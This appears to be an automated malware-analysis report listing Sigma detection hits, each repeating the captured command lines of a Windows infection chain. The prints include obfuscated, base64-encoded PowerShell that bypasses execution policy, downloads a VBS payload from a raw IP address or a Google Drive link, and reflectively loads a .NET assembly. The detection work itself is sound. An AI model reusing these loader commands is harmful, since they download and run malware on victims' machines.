0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0T
        Sigma detected: Potentially Suspicious PowerShell Child Processes
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4432, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" , ProcessId: 7336, ProcessName: wscript.exe
        Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2Fy
        Sigma detected: Suspicious MSHTA Child Process
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))", CommandLine: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgI
        Sigma detected: Suspicious PowerShell Parameter Substring
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4432, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE, ProcessId: 6852, ProcessName: powershell.exe
        Sigma detected: WScript or CScript Dropper
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4432, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" , ProcessId: 7336, ProcessName: wscript.exe
        Sigma detected: Change PowerShell Policies to an Insecure Level
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2Fy
        Sigma detected: Dynamic .NET Compilation Via Csc.EXE
        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAg